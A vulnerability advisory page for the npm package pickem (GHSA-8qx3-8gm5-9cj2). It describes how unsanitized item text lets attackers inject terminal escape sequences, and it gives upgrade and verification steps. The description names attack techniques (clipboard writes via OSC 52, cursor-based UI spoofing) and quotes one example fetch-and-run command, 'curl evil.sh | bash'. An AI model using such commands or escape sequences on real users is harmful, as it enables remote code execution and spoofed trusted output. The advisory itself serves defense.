Skip to content

← Actionable
High, CVSS 8.6

pickem vulnerable to terminal escape-sequence injection via unsanitized item text

GHSA-8qx3-8gm5-9cj2

What to do

Vendor fix available. Upgrade each affected package to the fixed version on its release line (pickem 1.0.7), redeploy, then verify what is actually installed.

This page has no inventory attached, so it cannot say whether you are affected. A vendor fix is not proof that your deployment is fixed.

Affected packages

  • npm pickem

    Affected
    < 1.0.7
    Fixed in
    1.0.7

Sources

Severity and exploitation
Exploitation
No confirmed exploitation recorded. Patch Next marks exploitation only from CISA KEV.
CVSS 4.0
8.6 · CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N · score source
EPSS
No dated EPSS signal available.
Source description

As published by the source; long descriptions are shortened.

Impact pickem rendered item text (label, description, group, meta, name) to the terminal with no control-character sanitization. chrome.row only stripped ANSI from the active row; inactive rows, the public createFormatter, and selection-summary lines printed labels raw, and the ANSI strip missed bare C0 controls anyway. Because item text is frequently attacker-controllable (git branch names, PR/issue titles, filenames, npm/API results), a malicious label was a terminal write primitive: - OSC 52 clipboard write — silently load e.g. curl evil.sh | bash into the user's clipboard; their next paste-into-shell is RCE. - Cursor-movement + erase (ESC1A, ESC[2K) — overwrite already-printed trusted lines to spoof UI (forge a "✓ Verified publisher", fake prompt, or hide a malicious entry). - BEL / C0 control flooding. Any CLI that passes untrusted strings into pickem choices is affected. Patches Fixed in 1.0.7. A new sanitizeDisplay() strips every escape sequence except inert SGR (color), plus…

Dates and revisions
Published by the source
Last modified by the source
Source last checked
  1. Revision 1 · created ·

    Published from ghsa record GHSA-8qx3-8gm5-9cj2

Agent brief

Preview the exact text before you copy it. Commands are read-only suggestions; review them before running anything.

# Patch Next advisory brief: GHSA-8qx3-8gm5-9cj2

Advisory: pickem vulnerable to terminal escape-sequence injection via unsanitized item text
IDs: GHSA-8qx3-8gm5-9cj2
Record: https://patchnext.com/advisories/ghsa-8qx3-8gm5-9cj2 (revision 1, source checked 26 Oct 2026, 13:01 UTC)
Inventory: none attached. This brief comes from a public page and does not say whether any deployment is affected.
Severity: High (CVSS 8.6)
Exploitation: no confirmed exploitation recorded. Patch Next confirms exploitation only from CISA KEV.
Vendor response: Vendor fix available; fixed versions by package: pickem 1.0.7. A vendor fix does not mean a deployment is fixed.

## Affected components
- npm pickem: affected < 1.0.7; fixed in 1.0.7

## Suggested inspection (read-only)
- `npm ls pickem --all`: lists every installed copy and version, including transitive ones. Run in the project root after `npm ci`.

## Supported action
Upgrade each affected component to a fixed version on its release line. For a transitive dependency, upgrade the parent package or add an override or constraint, then regenerate the lockfile. Redeploy every environment that ran an affected version.

## Required regression checks
- Run the test suite and a production build.
- Exercise the features that depend on pickem.
- Repeat the inspection and confirm that only fixed versions remain installed.

## Rollback considerations
- Keep the previous lockfile and deployment artifact. Rolling back reinstates the vulnerable version, so apply any documented mitigation while you fix forward.

## Unresolved questions
- Which deployments run an affected version?
- Exploitation status can change. Check again before lowering the priority.
- Mark the work resolved only after the fixed version is verified in production.

## Sources
- Verified: https://github.com/advisories/GHSA-8qx3-8gm5-9cj2 (GitHub-reviewed advisory GHSA-8qx3-8gm5-9cj2 lists affected ranges: npm pickem >=0 <1.0.7)

Commands are suggestions: review each one before running it.

Loading voting…